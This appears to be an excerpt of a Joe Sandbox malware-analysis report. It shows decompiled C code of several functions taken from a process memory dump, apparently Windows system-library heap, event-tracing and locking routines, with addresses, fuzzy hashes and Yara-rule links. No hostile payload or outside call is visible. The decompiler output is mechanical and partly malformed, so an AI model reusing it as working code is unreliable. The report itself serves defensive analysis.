				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4cbd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04C46B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04C46B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04BE7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04C09AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04C0B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04BE4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















              0x04c47016
              0x04c4701e
              0x04c4702b
              0x04c47033
              0x04c47037
              0x04c4703c
              0x04c4703e
              0x04c47041
              0x04c47045
              0x04c4704a
              0x04c47050
              0x04c47055
              0x04c4705a
              0x04c47062
              0x04c47062
              0x04c4705a
              0x04c47064
              0x04c47064
              0x04c47067
              0x04c47071
              0x04c47096
              0x04c4709b
              0x04c470a2
              0x04c470a6
              0x04c470a7
              0x04c470ad
              0x04c470b3
              0x04c470b6
              0x04c470bb
              0x04c470c3
              0x04c470c3
              0x04c470c6
              0x04c470cd
              0x04c470dd
              0x04c470e0
              0x04c470e2
              0x04c470e2
              0x04c470ee
              0x04c47101
              0x04c470f0
              0x04c470f9
              0x04c470f9
              0x04c4710a
              0x04c4710e
              0x04c47112
              0x04c47117
              0x04c47118
              0x04c47118
              0x04c470bb
              0x04c4711d
              0x04c47123
              0x04c47131
              0x04c47131
              0x04c47136
              0x04c4713d
              0x04c4713e
              0x04c4713f
              0x04c4714a
              0x04c4714a
              0x04c47084
              0x04c47088
              0x00000000
              0x04c4708e
              0x04c4708e
              0x04c47092
              0x00000000
              0x04c47092

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fdf2fd799de4b1df17a772e9ce98239fba26e8d47f93d2a1f51f01fac0c733d4
              • Instruction ID: d8f52712fcb3f32581bab5bb1791e61afe94e4e926bdeeb087ceee48076e9fd3
              • Opcode Fuzzy Hash: fdf2fd799de4b1df17a772e9ce98239fba26e8d47f93d2a1f51f01fac0c733d4
              • Instruction Fuzzy Hash: CA31C4766057919FC321DF68C940A6AB3FAFFC8700F044A29F89987690E730F904D7A5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BEC182 Relevance: .1, Instructions: 104COMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E04BEC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04BE7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04C98D34(_v8, _t80);
					}
					E04BE2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04BDFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04C98833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04BDFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04C0B180();
						if(_a4 != 0) {
							E04BE2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04BEBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04BEBB2D(_t16, _t15);
						E04BEB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04BDFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04BDFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04BDFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















              0x04bec18d
              0x04bec18f
              0x04bec191
              0x04bec19b
              0x04bec1a0
              0x04bec1d4
              0x04bec1de
              0x04c32d6e
              0x04bec1e4
              0x04bec1e4
              0x04bec1e4
              0x04bec1ec
              0x04c32d7d
              0x04c32d7d
              0x04bec1f3
              0x04bec1ff
              0x04c32d88
              0x04c32d8d
              0x04c32d94
              0x04c32d94
              0x04c32d9f
              0x04c32da4
              0x04c32dab
              0x04c32db0
              0x04c32db2
              0x04c32db3
              0x04c32db4
              0x04c32dbc
              0x04c32dc3
              0x04c32dc3
              0x04bec205
              0x04bec205
              0x04bec208
              0x04bec20e
              0x04bec211
              0x04bec216
              0x04bec219
              0x04bec21f
              0x04bec222
              0x04bec22c
              0x04bec234
              0x04bec23a
              0x04bec23f
              0x04bec245
              0x04bec24b
              0x04bec251
              0x04bec25a
              0x04bec276
              0x04bec27d
              0x04bec27d
              0x04bec25c
              0x04bec25c
              0x00000000
              0x04bec25e
              0x04bec1a4
              0x04bec1aa
              0x04bec1b3
              0x04bec265
              0x04bec26c
              0x04bec26c
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
              • Instruction ID: b25d8fcddf4c99e421f4fe2b6f778810a02732450f9eb96002820de6c2779f27
              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
              • Instruction Fuzzy Hash: 40317C72705546BEEB08EBB5C480BF9FB64FF82208F0841DAC51C47241EB357A15D7A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C08EC7 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E04C08EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x4cbd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04BF4E70(0x4cb86e4, 0x4c09490, 0, 0);
					if( *0x4cb53e8 > 5 && E04C08F33(0x4cb53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x4cb53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x4cb53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x4babc46;
						_t48 = E04C47B9C(0x4cb53e8, 0x4babc46, _t67, 0x4cb53e8, _t70,  &_v140);
					}
				}
				return E04C0B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































              0x04c08ec7
              0x04c08ed9
              0x04c08edc
              0x04c08ee6
              0x04c08ee9
              0x04c08eee
              0x04c08efc
              0x04c08f08
              0x04c41349
              0x04c41353
              0x04c4135d
              0x04c41366
              0x04c4136f
              0x04c41375
              0x04c4137c
              0x04c41385
              0x04c41390
              0x04c41391
              0x04c4139c
              0x04c4139d
              0x04c413a6
              0x04c413ac
              0x04c413b2
              0x04c413b5
              0x04c413bc
              0x04c413bf
              0x04c413c2
              0x04c413c5
              0x04c413c8
              0x04c413cb
              0x04c413ce
              0x04c413d1
              0x04c413d4
              0x04c413d7
              0x04c413da
              0x04c413dd
              0x04c413e0
              0x04c413e3
              0x04c413e6
              0x04c413e9
              0x04c413f6
              0x04c41400
              0x04c41400
              0x04c08f08
              0x04c08f32

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ff1e480591081f9abb70d6469127b47dad65b0f110b1e8636d12d001137e77de
              • Instruction ID: bcc546d555ae549c26389888bdd37e198d734a80cd0d62b0b644bdd97b106477
              • Opcode Fuzzy Hash: ff1e480591081f9abb70d6469127b47dad65b0f110b1e8636d12d001137e77de
              • Instruction Fuzzy Hash: 3D41C3B1D003189FDB14CFAAD980AADFBF5FB48314F5081AEE549A7240E7746A45CF60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BFE730 Relevance: .1, Instructions: 89COMMON
              Download Yara Rule
              C-Code - Quality: 74%
              			E04BFE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04C09670() < 0) {
					L04C1DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4cb7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04BE4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04BFE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















              0x04bfe730
              0x04bfe736
              0x04bfe738
              0x04bfe73d
              0x04bfe73e
              0x04bfe740
              0x04bfe749
              0x04bfe765
              0x04bfe76a
              0x04bfe76b
              0x04bfe76c
              0x04bfe76d
              0x04bfe76e
              0x04bfe76f
              0x04bfe775
              0x04bfe777
              0x04bfe77e
              0x04c3b675
              0x04bfe784
              0x04bfe784
              0x04bfe789
              0x04bfe7a8
              0x04bfe7ac
              0x04bfe807
              0x04bfe7ae
              0x04bfe7ae
              0x04bfe7b1
              0x04bfe7b4
              0x04bfe7b9
              0x04bfe7c0
              0x04bfe7c4
              0x04bfe7ca
              0x04bfe7cc
              0x00000000
              0x04bfe7d3
              0x04bfe7d6
              0x00000000
              0x00000000
              0x04bfe7ff
              0x04bfe802
              0x00000000
              0x00000000
              0x04bfe7f9
              0x04bfe7fc
              0x00000000
              0x00000000
              0x04bfe7f3
              0x04bfe7f6
              0x00000000
              0x00000000
              0x04bfe7ed
              0x04bfe7f0
              0x00000000
              0x00000000
              0x04bfe7e7
              0x04bfe7ea
              0x00000000
              0x00000000
              0x04c3b685
              0x04c3b688
              0x00000000
              0x00000000
              0x04c3b682
              0x00000000
              0x00000000
              0x04bfe7cc
              0x04bfe7d9
              0x04bfe7dc
              0x04bfe7de
              0x04bfe7de
              0x04bfe7ac
              0x04bfe7e4
              0x04bfe74b
              0x04bfe751
              0x04bfe759
              0x04bfe761
              0x04bfe761

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d3660ead267eb88bc09ddce5f336423613bf482872c2450e7e5796c1c1601a1f
              • Instruction ID: 626d278e254ecd1dd9a9e49f42f2b45a2ea4a409b7ab53b2211298aa0d742a61
              • Opcode Fuzzy Hash: d3660ead267eb88bc09ddce5f336423613bf482872c2450e7e5796c1c1601a1f
              • Instruction Fuzzy Hash: EA318D75A14249EFD744CF18D841B9AB7E5FB09314F148296FA08CB351E631FD80CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BFBC2C Relevance: .1, Instructions: 88COMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E04BFBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4cb6100; // 0x33
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04BE2280(0xd, 0x17f8f1a0);
				_t41 =  *0x4cb60f8; // 0x0
				if(_t41 != 0) {
					 *0x4cb60f8 =  *_t41;
					 *0x4cb60fc =  *0x4cb60fc + 0xffff;
				}
				E04BDFFB0(_t41, 0x800, 0x17f8f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4cb60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04BE4620(0x4cb6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4cb6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










              0x04bfbc36
              0x04bfbc42
              0x04bfbc45
              0x04bfbc4a
              0x04bfbd35
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x04bfbc50
              0x04bfbc50
              0x04bfbc58
              0x04bfbc5a
              0x04bfbc60
              0x00000000
              0x00000000
              0x04c3a4f2
              0x04c3a4f6
              0x00000000
              0x00000000
              0x00000000
              0x04c3a4fc
              0x04bfbc79
              0x04bfbc7e
              0x04bfbc86
              0x04bfbd16
              0x04bfbd20
              0x04bfbd20
              0x04bfbc8d
              0x04bfbc94
              0x04bfbcbd
              0x04bfbcca
              0x04bfbccb
              0x04bfbccc
              0x04bfbccd
              0x04bfbcce
              0x04bfbcd4
              0x04bfbcea
              0x04bfbcee
              0x04bfbcf2
              0x04bfbd00
              0x04bfbd04
              0x00000000
              0x04bfbc96
              0x04bfbcab
              0x04bfbcaf
              0x04bfbd2c
              0x04bfbd2c
              0x04bfbd09
              0x00000000
              0x04bfbd09
              0x04bfbcb1
              0x04bfbcb5
              0x04bfbcbb
              0x00000000
              0x00000000
              0x00000000
              0x04bfbcbb

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d9eb4784f9fcd876293803a3ea0102535b5b55c487a063adc56231819b896c7a
              • Instruction ID: 32a22553443c8f2db7f39bede485afd5057d87ffe40eb621544065b324218f34
              • Opcode Fuzzy Hash: d9eb4784f9fcd876293803a3ea0102535b5b55c487a063adc56231819b896c7a
              • Instruction Fuzzy Hash: BE31013A704A059BDB01DF58D8807A673A8EB18314F0400B8EE48DB201E778FD099BC1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BC9100 Relevance: .1, Instructions: 87COMMON
              Download Yara Rule
              C-Code - Quality: 76%
              			E04BC9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4c9f6e8);
				E04C1D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04C988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04C1D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4cb86c0; // 0x31007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4cb86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04BE2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04C988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04C0AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4cbb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4cb84c0;
										if(_t69 >=  *0x4cb84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04C99063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04BC922A(_t82);
							_t53 = E04BE7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04C98B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4cb86c0; // 0x31007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4cb86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4cb86bc;
										_t72 = 0x4cb86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04BC9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4cb86c4;
									_t72 = 0x4cb86c0;
									L18:
									E04BF9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















              0x04bc9100
              0x04bc9100
              0x04bc9100
              0x04bc9100
              0x04bc9102
              0x04bc9107
              0x04bc910c
              0x04bc9110
              0x04bc9115
              0x04bc9136
              0x04bc9143
              0x04c237e4
              0x04c237e4
              0x04bc9149
              0x04bc914e
              0x04bc914e
              0x04bc9117
              0x04bc911d
              0x00000000
              0x00000000
              0x04bc911f
              0x04bc9125
              0x00000000
              0x04bc9151
              0x04bc9158
              0x04bc915d
              0x04bc9161
              0x04bc9168
              0x04c23715
              0x00000000
              0x04bc916e
              0x04bc916e
              0x04bc9175
              0x04bc9177
              0x04bc917e
              0x04bc917f
              0x04bc9182
              0x04bc9182
              0x04bc9187
              0x04bc9187
              0x04bc918a
              0x04bc918d
              0x04bc918f
              0x04bc9192
              0x04bc9195
              0x04bc9198
              0x04bc9198
              0x04bc9198
              0x04bc919a
              0x00000000
              0x00000000
              0x04c2371f
              0x04c23721
              0x04c23727
              0x04c2372f
              0x04c23733
              0x04c23735
              0x04c23738
              0x04c2373b
              0x04c2373d
              0x04c23740
              0x00000000
              0x00000000
              0x04c23746
              0x04c23749
              0x00000000
              0x00000000
              0x04c2374f
              0x04c23751
              0x00000000
              0x00000000
              0x04c23757
              0x04c23759
              0x04c2375c
              0x04c2375c
              0x04c2375e
              0x04c2375e
              0x04c23761
              0x04c23764
              0x00000000
              0x00000000
              0x04c23766
              0x04c23768
              0x04c237a3
              0x04c237a3
              0x04c237a5
              0x04c237a7
              0x04c237ad
              0x04c237b0
              0x04c237b2
              0x04c237bc
              0x04c237c2
              0x04c237c2
              0x04c237b2
              0x04bc9187
              0x04bc9187
              0x04bc918a
              0x04bc918d
              0x04bc918f
